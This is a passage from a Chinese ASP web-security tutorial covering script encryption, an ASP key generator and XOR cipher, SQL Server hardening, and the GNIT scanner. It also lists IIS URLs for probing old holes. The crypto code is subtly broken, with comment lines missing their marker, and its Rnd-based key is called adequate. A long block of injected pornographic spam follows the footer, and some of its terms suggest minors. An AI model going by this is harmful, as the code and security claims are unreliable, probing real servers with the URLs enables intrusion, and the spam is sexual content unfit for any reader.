COM/DCOM組件來重新開發(fā)、實(shí)現(xiàn)并替換。

2,"腳本加密"即ASP腳本仍直接按源代碼方式進(jìn)行開發(fā),但在發(fā)布到運(yùn)行環(huán)境之前將腳本進(jìn)行加密處理,只要把加密后的密文腳本發(fā)布出去。即在ASP.DLL讀取腳本這個(gè)環(huán)節(jié)加入密文還原的處理。實(shí)現(xiàn)這種思路的方法有兩種:一是自行開發(fā)一個(gè)ISAPI的IIS過濾(filter)塊,在ASP.DLL之前勾連(hook)對(duì)ASP腳本文件的讀取,以便把文件系統(tǒng)讀出的密文還原成ASP.DLL可以解釋的明文;
方法二是直接由ASP.DLL提供對(duì)ASP腳本加密處理的支持。微軟在新版本的Vbscript.dll jscript.dll中提供這種成為MS script encode技術(shù)的支持。這樣,無論是客戶端的Vbscript jscript(包括WSH腳本等),還是服務(wù)器端的Vbscript jscript (即ASP腳本)都可以支持加密處理。
MS script encode 技術(shù)具體的實(shí)現(xiàn)思路包括以下兩個(gè)方面:一是加密過程,通過提供一個(gè)實(shí)用程序?qū)Π珹SP腳本源代碼的文本文件進(jìn)行掃描,找出其標(biāo)記為<script language = "vbscript.encode">或<script language = "Jscript.encode">;二是還原過程,IE或ASP.DLL等執(zhí)行腳本時(shí)是統(tǒng)一通過Vbscript.dll jscript.dll來解釋執(zhí)行的,所以它們都能同時(shí)地、透明地支持明文和密文的腳本。
  總之,如果采用第一種思路,要么就自行在開發(fā)過程中遵照進(jìn)行,要么可以考慮選擇自動(dòng)轉(zhuǎn)換成visual basic 編譯代碼的通用的、實(shí)用工具;采取第二種思路的化,要么就自行開發(fā)IIS ISAPI過濾模塊,要么可以考慮直接采用MS script encode軟件。

下面來看看一種ASP可以使用的簡單字符加密算法,而不是那些受限制的加密算法。其實(shí),這里介紹的加密算法對(duì)于一般的運(yùn)用來說已經(jīng)足夠解密人麻煩一陣子的了。它的加密基礎(chǔ)是最簡單的Vernum密碼方法,它的基本原理是,需要有一個(gè)需要加密的明文和一個(gè)隨機(jī)生成的解密鑰匙文件。然后使用這兩個(gè)文件組合起來生成密文。

(明文) 組合 (密鑰) = 加密后的密文

所以這里介紹的是生成密鑰的代碼。我們假設(shè)我們生成的密鑰為512位長的密鑰,它已經(jīng)足夠來加密一個(gè)文本字符了。代碼如下:

KeyGeN.asp文件
<%
******************************
KeyGeN.asp
******************************
Const g_KeyLocation = "C:\key.txt"
Const g_KeyLen = 512

On Error Resume Next

Call WriteKeyToFile(KeyGeN(g_KeyLen),g_KeyLocation)

if Err <> 0 Then
Response.Write "ERROR GENERATING KEY." & "<P>"
Response.Write Err.Number & "<BR>"
Response.Write Err.Description & "<BR>"
Else
Response.Write "KEY SUCCESSFULLY GENERATED."
End If

Sub WriteKeyToFile(MyKeyString,strFileName)
Dim keyFile, fso
set fso = Server.CreateObject("scripting.FileSystemObject")
set keyFile = fso.CreateTextFile(strFileName, true)
keyFile.WriteLine(MyKeyString)
keyFile.Close
End Sub

Function KeyGeN(iKeyLength)
Dim k, iCount, strMyKey
lowerbound = 35
upperbound = 96
Randomize Initialize random-number generator.
for i = 1 to iKeyLength
s = 255
k = Int(((upperbound - lowerbound) + 1) * Rnd + lowerbound)
strMyKey = strMyKey & Chr(k) & ""
next
KeyGeN = strMyKey
End Function

%>

在IIS下運(yùn)行上面的KeyGeN.asp頁面。你只需要如此做一次,他將把密鑰寫入文件c:\key.txt中 (如果你愿意的話,你也可以把這個(gè)文件放到另外一個(gè)更加安全的地方),然后你可以打開這個(gè)key.txt文件,它將包含512個(gè)ASCII碼在35到96之間的字符。并且由于是隨機(jī)生成的,所以每個(gè)人的私人密鑰文件key.txt將是不一樣的,下面是一個(gè)例子密鑰文件:

IY/;$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E$.DLG=I+@5%*+OP:F_=;NSY`-^S.`AA=BJ3M0.WF#T5LGK
(=/<:+C2K/^7AI$;PUOME2+T8ND?W$C(J\,;631M-LD5F%%1TF_&K2A-D-54[2P,#*JU%6`0RF3CMF0(#T07UFZ=>#,+.AW_/+)
DIB;2DTIA57TT&-]O/*FM>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,$2#FWW5PBH^*<))A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U$:3XO^Q).KG&0N0);[LJ<OZ6IN?7N4
<GTL?(M4S8+3JMK5)HC%^1^+K;\$WBXPA?F&5^E\D$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V

下面再仔細(xì)分析一下上面的程序,我們發(fā)現(xiàn)其中的lowerbound和upperbound的數(shù)值
其實(shí)就是你想使用來加密的ASCII字符范圍。

下面的代碼將介紹如何使用這個(gè)密鑰來加密和解密一個(gè)字符串

Crypt.asp文件
<%
Dim g_Key

Const g_CryptThis = "Now is the time for all good men to come to the aid of their country."
Const g_KeyLocation = "c:\key.txt"

g_Key = mid(ReadKeyFromFile(g_KeyLocation),1,Len(g_CryptThis))

Response.Write "<p>ORIGINAL STRING: " & g_CryptThis & "<p>"
Response.Write "<p>KEY VALUE: " & g_Key & "<p>"
Response.Write "<p>ENCRYPTED CYPHERTEXT: " & EnCrypt(g_CryptThis) & "<p>"
Response.Write "<p>DECRYPTED CYPHERTEXT: " & DeCrypt(EnCrypt(g_CryptThis)) & "<p>"

Function EnCrypt(strCryptThis)
Dim strChar, iKeyChar, iStringChar, i
for i = 1 to Len(strCryptThis)
iKeyChar = Asc(mid(g_Key,i,1))
iStringChar = Asc(mid(strCryptThis,i,1))
*** uncomment below to encrypt with addition,
iCryptChar = iStringChar + iKeyChar
iCryptChar = iKeyChar Xor iStringChar
strEncrypted = strEncrypted & Chr(iCryptChar)
next
EnCrypt = strEncrypted
End Function

Function DeCrypt(strEncrypted)
Dim strChar, iKeyChar, iStringChar, i
for i = 1 to Len(strEncrypted)
iKeyChar = (Asc(mid(g_Key,i,1)))
iStringChar = Asc(mid(strEncrypted,i,1))
*** uncomment below to decrypt with subtraction
iDeCryptChar = iStringChar - iKeyChar
iDeCryptChar = iKeyChar Xor iStringChar
strDecrypted = strDecrypted & Chr(iDeCryptChar)
next
DeCrypt = strDecrypted
End Function

Function ReadKeyFromFile(strFileName)
Dim keyFile, fso, f
set fso = Server.CreateObject("Scripting.FileSystemObject")
set f = fso.GetFile(strFileName)
set ts = f.OpenAsTextStream(1, -2)

Do While not ts.AtEndOfStream
keyFile = keyFile & ts.ReadLine
Loop

ReadKeyFromFile = keyFile
End Function

%>

在Crypt.asp中我們首先從密鑰文件中得到密鑰值,然后從這段密鑰中截取和我們需要加密的明文同樣長度的密鑰。然后使用一個(gè)簡單的異或操作將明文和密鑰進(jìn)行運(yùn)算,那么得到的結(jié)果就是加密后的密文了。過程很簡單的。由于是使用了異或操作,所以解密將非常簡單,只要使用同樣的密鑰對(duì)密文再次進(jìn)行異或操作就能夠解密了。在上面介紹的基礎(chǔ)上,你可以少加改動(dòng),就可以使用同樣的方法加密一個(gè)文件。唯一需要注意的是,對(duì)于一個(gè)二進(jìn)制文件,你需要做一些完整性檢查以保證轉(zhuǎn)換回來的字符不要越界。
現(xiàn)在你需要做的就是把密鑰保存在服務(wù)器上的一個(gè)安全的地方(不能夠被外部訪問)


15 SQL SERVER的安全性

目前用ASP編寫的WEB應(yīng)用中,后臺(tái)數(shù)據(jù)庫大部分SQL SERVER。SQL SERVER相對(duì)來說比較安全。但是也要小心地配置SQL Server。

1 安裝遠(yuǎn)程數(shù)據(jù)庫管理有風(fēng)險(xiǎn)
SQL Server支持從遠(yuǎn)程進(jìn)行數(shù)據(jù)庫的維護(hù)。在安裝時(shí)你可以選擇不安裝,安裝完成以后,你還可以通過"SQL Server Network Utility"來刪除遠(yuǎn)程管理。如果你要使用遠(yuǎn)程管理,請(qǐng)使用TCP/IP,并將缺省的端口1433改變?yōu)槠渌臄?shù)值。使用遠(yuǎn)程對(duì)你可能比較方便,便是請(qǐng)注意一個(gè)hacker只要知道你的SQL server密碼,就可以進(jìn)入你的數(shù)據(jù)庫。
2 改變sa的密碼
缺省安裝時(shí),SQL SERVER的sa賬號(hào)的密碼為空,建議你在Enterprise SERVER中,改變sa的密碼。
3 數(shù)據(jù)庫登錄賬號(hào)不要寫入ASP頁面中。


16 使用最新的掃描器掃描ASP漏洞

目前可以掃描IIS漏洞的掃描器有很多,比較有名的有ISS,CIS和gnit等。下面我們以GNIT為例子。
GNIT是個(gè)功能很強(qiáng)的漏洞掃描器,能掃描NT的用戶名和相關(guān)信息列表,掃描IIS的漏洞。
在WINNT的DOS模式下打下:
gnit <對(duì)方IP>
比如:gnit 172.1.1.1

GNIT開始掃描端口,從上圖可知目標(biāo)主機(jī)提供了HTTP,F(xiàn)TP,SMTP等服務(wù),掃描完后。會(huì)在GNIT目錄下生成一個(gè)HTML文件,其文件名是目標(biāo)主機(jī)的IP。打開這個(gè)HTML文件,會(huì)看到對(duì)方主機(jī)的一些信息和漏洞。這些信息和漏洞包括:用戶名和組的相關(guān)詳細(xì)信息,開放的服務(wù)和WEB掃描的漏洞等。我們比較關(guān)心的是WEB掃描的漏洞信息:
下圖是GNIT的WEB掃描一些信息,其中加粗部分是漏洞,當(dāng)然有些漏洞并不準(zhǔn)確,但不妨試試。(有必要說明下,以下我是在一臺(tái)NT4。01,IIS4。0,Option PACK6.0,并且缺省安裝)

 要測(cè)試這些漏洞很簡單。比如:可在URL輸入:
 http://someurl/iisadmpwd/aexp3.htr
―――可遠(yuǎn)程管理IIS。

http://someurl/scripts/iisadmin/bdir.htr
――――目標(biāo)主機(jī)的硬盤全部目錄都一覽無余,并且有創(chuàng)建新目錄的功能(不過我在測(cè)試中,并不能創(chuàng)建遠(yuǎn)程目錄,但是能使目標(biāo)主機(jī)的WEB當(dāng)機(jī))
http://someurl/scripts/tools/getdrvrs.exe
 ----可在遠(yuǎn)程主機(jī)上創(chuàng)建ODBC數(shù)據(jù)庫,不管數(shù)據(jù)庫路徑和數(shù)據(jù)庫是否存在。

 
   此外還有其它的漏洞,請(qǐng)網(wǎng)友自己測(cè)試。其解決方法請(qǐng)看上面的漏洞分析。如果用CIS掃描器,還有比較詳細(xì)的漏洞分析和解決方法。請(qǐng)讀者自己分析。

七、總結(jié)

  目前WEB數(shù)據(jù)庫訪問的多種技術(shù)中,比如CGI(通用網(wǎng)關(guān)接口)、JDBC、PHP、ASP,ASP以其開發(fā)周期短,存取方式數(shù)據(jù)庫簡單,運(yùn)行速度快而成為眾多網(wǎng)站程序員的首選開發(fā)技術(shù)。但是其網(wǎng)絡(luò)安全性也是不容忽視的。做為一個(gè)ASP開發(fā)者,你必須關(guān)注NT和IIS的安全漏洞,從上面的討論我們可以看到ASP的很多漏洞都是由IIS所引起的。同時(shí)ASP程序員在開發(fā)自己的網(wǎng)站時(shí),要注意來自ASP程序設(shè)計(jì)不當(dāng)所引發(fā)的安全問題。

該文章在 2011/4/24 0:33:39 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場(chǎng)作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲(chǔ)管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2024 ClickSun All Rights Reserved

美女性感一二区,天堂久久久久久中文,自拍偷拍亚洲动漫 ,小浪货腿打开水真多视频,国产无套内精在线观看,巨胸喷奶水免费视频,欧美一级粗黑,免费高清欧美一区二区三区,黑人越猛烈欧美XX00动态图,最近亚洲国产网页aⅴ,少妇自拍视频一区,亚洲精品福利视频久久,最新手机国产在线小视频,国产午夜福利无,在线免费观看国产污污污视频,97视频国产中文,在线欧美sm一卡
天天夜夜狠狠一区二区三区 | 白嫩 少妇 影院| 亚洲欧美中文字幕国产| 深夜XX00美女高潮视频| 亚洲無碼中文字幕在线观看| 床震未满十八禁止观看免| 337日本中文有码| 国产美女视频全黄扒开| 婷婷在线影院| 96精品视频免费在线免费观看| 亚洲一区在线观看尤物| 精品亚洲Aⅴ在线| yellow中文字幕资源| 天天爽夜夜欢免费视频| 3D动漫H在线观看网址蜜芽| 黄H视频在线观看| 动漫精品亚洲一区二区三区| 白丝少妇喷水网站| 久久久久久久岛国免费aⅴ片| 亚洲两性视频一三区| 拍拍拍免费视频噜噜噜完整版| 国产免费网站好大好爽好硬| 国产美女精品AⅤ在线老女人| 最新国产美女口暴深喉| 99热这里只有精品最新地址获取| 高清女同学大乳在线观看| 国产午夜人做人免费视频网站男人放进女人阳道 | 男同桌上课用手指进去了好爽| va不卡一区二区三区得| 国产理论片在线播放| 日本少妇被黑人xxxxx| 亚洲十八禁在线观看| 亚洲国产精品导航| 午夜影院麻豆| 波多野结衣高潮感受| 国产白丝喷水娇喘视频| 丝袜屈辱日韩国产| 男人到天堂去a线2019在线观看 | 亚洲精品国产精品乱码不卡√| 亚洲久本草在线中文字幕| China国产麻豆video| 五月天伊人久久| 网址你懂的在线观看日本| 国产精品九九色| 亚洲国产天堂久久综合226114| 成 人动漫a v 免费观看| 孕妇三级天堂视频| AV女人天堂| 久久综合少妇11p| 亚洲色大网站WWW| 白浆 高潮国产免费| 国产高清视频在线观看69| 午夜刺激福利电影在线观看| 大胆人术艺术露私亚洲| 国产尤物视频在线观看| 强美女的免费视频网站| 精品白丝喷水jk娇喘视频| 国产丝袜一区二区在线播放 | 2022国产城人在线视频| 国色天香社区在线观看免费| 91白浆视频在线| 国产浓密毛毛在线观看| 在线制服丝袜视频网站| AV色原在线观看| 最爽的乱惀另类| 国产麻豆hdfreesexvid| h纯动漫无遮挡在线观看| 九九久久五月天精品| 亚洲原创国产AV| 2019国产精品青青草原| 久久天天躁日日躁狠| 91极品尤物在线观看| 婷婷好紧好多水国产好硬 | 国产凹凸在线观看一区二区| 337p人体亚洲日韩欧美| 女邻居夹得好紧在线视频| yy11111111手机版少妇`院| 国产人妇三级视频在线观看| 亚洲欧美闷骚少妇影视| 欧美同志视频免费| 又黄又爽又无遮挡的视频1000| 成年网站在线观看播放| 一区二区三区视频| 又大又粗又爽又黄的少妇片| 亚洲人看A∨免费片| 一级免嘿AV片| 黑人vs日本护士| 国产 日韩 综合网| 国产精品欧美激情卡通动漫| 日本中字在线视频二区| A级成年轻人电影直接看| 2021国内精品久久久久久影院| 久久十次啦| 18勿进国产AV| 欧美动态无遮挡| 国产老女人免费观看黄A∨片| 国产色A在线观看| 在线国产精品色| 加勒比一木道|视频在线看| 又黄又粗暴120秒免费视频| 丰满视频在线观看免费| 伊人少妇75在线视频| 波多野结衣家庭教师一二三区 | 伊人少妇久久网| 粉嫩美女国产| 亚洲大肥熟女四五十路| 国产女主播19播放| 成年女人视频在线观看777| 亚洲中文国产最新在线观| 亚洲永久免费播放片欧洲专区 | 国产中文在线视频播放| 7777狠狠网| 国产在线精选免费视频8x| 综合亚洲二| yw193国产在线| 日本成本人片免费久久 | 菠萝久久夜| 少妇配种视频在线观看| 狠狠丁香尤物综合| 欧美三黄在线视频| 国产偷伦视频在线| 国产特级全黄一级毛卡片| 国产色产综合色产在线视频| 91大神资源尤物在线观看| 性色A∨人人爽网站| 91熟女网站| 张开腿无遮无挡在线观看| 色综合久久久久网| 久久国产高清字幕中文| 亚洲涩社区| 国产特黄a三级三级三级| 国产尤物视频91 在线| 国产美女被高潮网站| 色色福利视频| 国产精品福利精品福利短片 | 免费 成 人 黄 色 网 站| CHINESE乱子伦XXXX视| chinese男男喷潮视频| 正在播放 国产精品| 中文字幕一区韩国三级| 一国产欧美色性| 少妇熟女视频一区二区| 欧美xxxxx又粗又大| 日本高清无卡码一区二区久久| YY6080福利午夜理论影视| 久久高潮久久久久久| 高大丰满少妇嗷嗷叫456| 午夜少妇性影院私人影院在线| 18以下勿进色禁网站永久| 国产偷伦视频在线| 亚洲成AV人影院在线观看网| 影音先锋aⅴ亚洲中文字幕 | 00色色国产私拍| 九九re热国产精品视频| 偷拍中老年熟女综合| 全球熟女AⅤ大全导航| 国产狂喷潮在线观看中文| 色胡同热国产の综合| 久久国产十八禁| 日本免费在线看| 变态另类~第1页| 亚洲自拍天堂| 大肉蒂被嘬的好爽高H视频在线观看| 国产高清在线视频小尤奈| 国产欧美18p| 日日夜夜狠狠| baoyu永久免费视频网站| 欧美黑人又大又黑在线视频| 情侣自拍一区| 日韩AV一区二区精品不卡| 嗯啊视频欧美| 中文字幕嫩草| 国产精品萌白酱永久在线| 又长又粗又大的欧美性爱视频| 日出水成年人免费| 色老板在线精品免费视频| 国内外成年在线视频你懂的| 中中文字幕三区| 未成满十八禁止免费网站1| 澳门一级a视频| 外国三级真做在线观看| 欧美一区二区视频| 满18点击进入在线观看| 亚洲日韩精品久久| 成人AⅤ国产在线视频| 国产精品亚洲AⅤ一区| 97人人视频波多野结衣蜜月| 2021AV手机在线最新| 无套粉嫩国语对白| 中日韩成人影院免费观看| 国内精品自国内精品自线电影| 久久亚洲精品下载| 亚洲精品偷拍福利视频| 日本人手指高潮交视频| 国产一级婬片AA免费观看| 久久精品视频最新网址| 被操高潮受不了视频| 高跟翘臀老师后进式视频午夜| 国内视频在线视频一区国产| 国产美女高潮抽搐喷出白浆视频| baoyu222国产精品| 精品国产免费人成网站| 久久男女女视频| 又爽又黄又无遮掩的免费视频| 强奷漂亮岳的肉欲小说视频| 18以下禁止入内免费网站| 1313在线观看国产| 波多野结衣喷水视频| 日日噜噜夜夜狠狠视频男男| 久久精品一二三区| 高清国语自产拍免费| 国产强伦姧在线观看| 国产专区女高中生第一次在线| 午在线亚洲男人午在线| 一级日本午夜福利电影| 黑人导航第一福利| 日本不卡不码视频在线观看| 成人动漫在线观看网站| 翁熄浪公夜夜欢| 旧里番亚洲一区| 国产高潮在线看| 最新国产女同视频| 又粗又大又黄又爽的免费视频网站| 亚洲AV色男人的天堂| 欧美,日韩aⅴ| 亚洲日韩欧洲不卡在线手机版| 亚洲欧美综合国产精品二区| 国产高潮流白浆免费观看网站| 最近中文字幕2018中文字幕| 邻居少妇下面好紧好多水真爽| 久久久推油| 免费大波美女做受视频| 把腿扒开做爽爽视频| 美女高潮抽搐流白浆视频| 伊人天堂视频网| les女女磨豆腐视频在线观看| 尤物国产精品福利三区| 亚洲精品有码在线观看| 精品一区二区三区| 久久精品国产字幕高潮| 在线观看视频白浆| 久久综合狠狠综合| 国产私拍福利精品视频推出| 亚洲?欧美日韩?另类| 久久精品aⅴ老熟女| 中国的一级性爱视频| 人人射网站| 在线观看亚洲十八禁网站| 性伦片欧美刺激片在线观看| 麻豆国产AV网站| 成·人免费午夜视频域名停靠| www五月综合网麻豆| 久久这里有精品15一区二区三区| 99久热re在线精品99re8热视频| 正在播放国产无套露脸视频| 成人精品视频在线观看不卡| 公妇仑乱在线观看| 国 产 呦 网 站| 日本亚洲理论片| 中文字幕大香视频蕉| 杨幂被艹视频在线观看| 精品国产另类AⅤ一区二区| 欧美无遮挡嘿咻嘿咻动态图| 99XXXX综合缴情网丁香五月天| 2019久久久精品| 中文字幕欧美生活片在线观看| 中文字幕专区高清在线观看| 伊人五月天在线| 少妇宾馆把腿扒开让我添69| 亚洲伊人九九大香线焦| 高清性色生活视频| 色8天天狠天天透天干天天怕| 亚洲男人第一αv网站| 亚洲人成77在线播放网站| 69视频在线观看A片| 亚洲蜜芽在线精品一区| 麻豆丝袜脚交在线播放| 大学生口完口爆吞精免费视频| А天堂中文最新版在线官网| 孕妇三级天堂视频| XX.00动态图视频| 日韩中文字幕dvd在线| 国产女教师专区在线观看| 色94色欧美SUTE亚洲线路一| mm131,免费视频| 亚洲中文影院| 成人嫩草研究院免费网址| hd 久久| 十次啦俺次啦中文亚洲| 国产玉足榨精视频在线观看| 免费观看的成年网站在线的| 国产在热线精品视频| 自产精品视频二区在| 国产精品中文久久久| 国产粉嫩在线播放| 户外露裸刺激视频| 第一页偷拍| www.在线播放色| 国产精品三四区| 优优日韩在线视频观看 | 手机永久AV在线播放| 又黄又w的网站| 老熟女六十路一区| 他扒开我的内裤强吻着我的下面视频| 一级a爱免费视频观| 与黑人巨大交动态图| 在线有码| 在线看欧洲一卡二卡三卡| 国内私拍精品视频| 国产自偷在线好视频| 97se在线观看亚洲| 国产骚高潮| 日本少妇有码| 白浆在线| 污视频网站日本免费| 尤物视频无毒不卡| 尤物蜜芽福利国产污在线观看 | 曰批免费视频播放免费日| 亚洲成AⅤ人的天堂在线观看女人 在线看片V免费观看视频777 | 天堂网亚洲系列亚洲系列| 国产亚洲精品AA片在线爽| 国产亚洲精品aⅴ在线| 婷婷激情在线观看| jk制服国产在线视频| 浴室乱子伦| 2021天天看夜夜看狠狠看| 正在播放国产爆浆| 最新日韩AV网址在线观看| 中文字幕久久综合久久88| 自拍偷拍美女一区二区| 99热这里只有精品免费推荐| 香港三级日本三级a视频| 亚洲熟女一区二区三区| 国产美女爽到尿喷出来视频| 亚洲国产Aⅴ日韩AV| 激情综合婷婷激情五月| 尤物99久久国产精品免费| 美女高潮抽搐流白浆视频| 世界美女大学生被干冒白浆| 久久精品福利中文字幕| 中文字幕精品亚洲无线码一区| 老汉色老汉首页a亚洲尤尤色| 国产AV嫩模精品| h国产小视频福利在线观看| 办公室秘书在线观看| 国产AV高清网站| 成年女午夜AV大全| 日本加勒比中文字幕| 真实偷窥女子会所私密按摩AV| 在线观看最新国产精品| 国产亚洲欧洲日韩在线| 粗大猛烈进出高潮小视频| 一级国产a免费| 久久国产黑丝袜视频| 亚洲精品二区360偷拍| 国产精品久久久夕精| 成 人影片 免费观看日本| 无遮挡h肉动漫在线观看免费资源| 华人亚洲欧美在线| 国产性高爱潮有声视频免费| 新2022AV视频网站| 日本久久a大片观看| 伊人久久性爱导航| 99精品痴汉视频| 国产亚洲网曝欧美台湾丝袜| chineseXXXX乱子另类| 性夜影院爽黄a爽两性关系| 国产成 人 综合 欧美 亚洲| 亚洲va久久久噜噜噜熟女88| 伊人五月天网站| 观看免费揉美女福利网站之国产盗摄| H片网站在线观看| 亚洲欧洲一级特黄美女被操| 欧美白人最猛性xxxxx| 自拍自偷第三页| 风韵犹存的美妇如狼似虎| 操日本熟女| 在线观看2021中文字幕| 色婷婷中文字幕| 超黄超污网站| 国产吧在线视频| 中文字幕aⅴ第一页在线| 九月丁香婷婷综合在线| 嗯啊……好爽视频| 波多野结衣a免费| 6080国产精品亚洲| 天天摸天天做天天爽2020| 日韩00XX视频| 小h片资源免费观看在线| 又大又粗又硬又爽的福利视频| 国产人成免费视频不卡码| 久久久久青草线蕉亚洲| 伊人五月天视频网站| 邪恶帝无翼乌福利全彩| 精品综合久久久久久久888| 国产冒白浆在线观看| 精品偷自拍另类在线观看| 国产毛茸茸的精品特写| 久久亚洲精品成人AV| 国产小呦泬泬在线| 91尤物在线| www_亚洲а∨| 国午夜产一级| 久久久888精品视频| 国产高潮女人在线播放| JAPANESE国产高清在线播| 00XX动态图| 美女被被视频一区二区三区| 亚洲精品天干| 午夜福利偷拍| 视频二区中出| 亚洲免费热女视频| 亚洲自偷自偷图片 自拍| 日韩丰满孕妇孕交AV| 国产妇女免费日| 久久精品亚洲日韩Av| 小辣椒福利视频导航| 精品国产污污免费网站入口| 我与公么激情性完整视频| 99爱在线精品视频免费看| 2022国产高潮在线观看| 一卡二卡三卡四卡网站 | 国xxxxx在线免费播放| AV在线网页大全| 久久五月天网站| 日韩H网站不卡| 又污又黄又无遮挡的网站| 8×8x永久免费视频在线观看网址| 一级一级c片免费观看| 国产乱子伦一区二区三区| 日出白浆在线| 777米奇888视频在线观看| 国产特黄AV| 永久AV在线播放| 老师被操的在线视频色多多| 一进一出50分钟试看| 精品国产另类AⅤ一区二区| 中文字幕精品动漫一区| 亚洲五十路| 国产在线精品一区二区不卡麻豆| 麻豆高清国产AV| 六月婷婷激情综合网| 狠狠深爱开心五月| 精品在线视频欧美性爱| 国产AV剧情遭闺蜜嫉妒陷害| 在线18视频免费看| 黑人欧美又大的又粗| 两女互慰高潮视频在线播放| 小受咬床单失禁的gv在线观看| 国产一区麻豆精品一区 | 纯欲女生喷白浆视频| 亚洲欧美日韩高清有无在线播出| 2021国内精品久久久久久影院 | 亚洲裸男洗澡网站Gay| 4个闺蜜疯狂互换 5P同床好爽| 小屁孩cao大人图片| 2019亚洲免费网站观看视频| 综合图片一区亚洲小说区丁香 | a级国产片在线观看| 分一二三四区中文字永久幕| 久久久久久精品久久久| 色婷婷综合缴情综免费观看| 男女真人后进式猛烈qq动态图| 亚洲精品国产20p| 日哟AV免费看| 精品国产私拍福利电影| 97夜夜澡人人爽人人喊中国片| 秋霞导航一区二区| 又黄又硬好爽免费视频| 真人最新100部拍拍拍直播| 337p亚洲人术艺术| 衣服被扒开强摸双乳网站| 337p亚洲人体一区二区三区 | 亚洲热网| 麻豆精品乱子伦| 国内精品一区二区三区不卡| 欧美性爱喷潮视频播放| 婷婷悠悠色悠在线播放| 嗯~啊~太爽了要高潮的视频 | 18勿看免费大片1000拍拍| 日本在线观看免费看视频| 大屁股喷水的视频| 又粗又大又爽又紧免费视频| 野草视频在线观看免费最新| 久久综合国产乱子伦精品免费| 91香蕉国产线观看免费| 老妇xxxxx性开放| 波多野结衣视频三区| 精品中文字幕有码?屁网站免费 | 亚洲依依成人综合网址首页| 日韩AⅤ精品国内在线| 亚洲十八禁天堂| 最新精品国偷自产在线美女足| 两女互慰高潮视频在线播放 | 亚洲夜噜噜噜| 网站黄在线观看免费最新版| sm另类小sao货水好多真紧h视频 | 女人脱裤子让男生桶爽在线观看| 99久久综合狠狠综合| 国产美女AV在线免费观看| 在线观看刺激影院| FREE性欧美媓妇VIDEO| 又粗又大欧美激情| 免费喷乳视频| 又粗又黄又猛又爽大片免费视频 | 日韩国产欧美三区| 久久久久久片视频| 69式视频久久| 高潮十八禁爽到爆免费看| 亚洲白嫩美女在线| 男人j进入女人j内部免费网站| 波多野结衣免费视频一区二区三区| 日批视频亚洲| 国内凹凸色在线视频| 丰满少妇中出中文| 欧美A性| 婷婷激情在线观看| 又粗又大欧美激情| 国产福利一区首页| 91高清免费国产自产拍| 国产十八禁视频在线网站| 欧美极品少妇性运交| 亚洲亚洲人成综合丝袜图片| 亚洲日韩国产精品一区| 91p在线播放国产| 最新奇米7777第四视频| 亚洲日韩AV片在线观看| 天天影院色香综合| 波多野结衣与乡下老人在线| 久久噜噜噜久久亚洲va久久| аⅴ天堂国产最新版在线中文| yw亚洲一区二区三区| 国产乳头在线| 胸大又www的网站| 尤物AV永久免费观看| 国产精品jk白丝在线播放 | 亚洲日韩国产精品第一页一区| 国产美女高潮视频免费的| 国产又刺激又黄又免费的视频| 日韩麻豆小视屏| 精品 日韩 国产 欧美 视频| 十八禁在线网站| www美女少妇日韩| 精品三级久久久久电影网| 大学生高潮流白浆在线观看| 好涨好爽好硬免费视频国产| 野花视频在线观看免费版6| 日本a区精品| 激情五月综合AⅤ在线| 把jk制服美女弄高潮在线视频| 3D动漫一区第2页| 中文字幕天堂中文| 777米奇888视频在线观看| 五月丁香五香网网| 丁香五月七月综合激情| 外国一又粗又大一级完整版| 午夜福利视频男同女同| 伊人心综合视频| 在线播放无遮挡免费视频| 古典武侠丝袜制服| 亚洲区小说区图片区qvod| 免费视频网站嗯啊轻点动漫| 18以下勿进色禁视频免费看| 思思99热思思久久最新精品| JIZZ丝袜老师国产在线观看| 2022AV视频播放| 国产乱通伦| 国产精品婬妇| 亚洲天堂AV麻豆| 国产亚洲精品第一综合麻豆| 一级免费无遮挡少妇出进连连高潮完整视频 | 国产精品va在线播放| 啊灬啊灬用力…啊快视频| 亚洲区色多多| 国产翘臀美女XX00后进式在线观看| 久久久久藏经阁免费观看| 3d动漫偷拍亚洲| GV视频在线观看香蕉| 国产成a人片在线观看视频| 99久久99视频只有精品| 又污又爽又黄的网站| 日本免费在线看| 午夜福利试看120秒体验区| 午夜刺激福利电影在线观看| 永久精子网在线观看免费| 喷水揉捏激烈高潮娇喘视频| 日本高清一区免费中文视频| 亚洲产大香伊人蕉在线播放| 亚洲人成电影在线手机网站安卓版| 6080YYY午夜理论片免费| 国产精品一区二区含羞草| 亚洲依依成人综合网站| h喷水视频在线| 亚州一区免费电影| 国产H肉在线视频免费观看| 538精品视频免费在线观看| 国产青榴在线| 手机在线无毒AV网站| AV天堂最新手机网址| 伊人久久亚洲综合影院| 亚州男同网| 国产污污污免费网站| 成a人片免费网址| 啊好粗受不了了视频| 久久张柏芝| 精品一区二区国产在线观看| 岳的水多肥嫩鲜艳| 国产婷婷色综合AV| 久久伊人尤物视频| 欧美一级久久久免费| 国产喷水AⅤ| 最新亚洲人成网站在线观看| 在线孕交不卡| 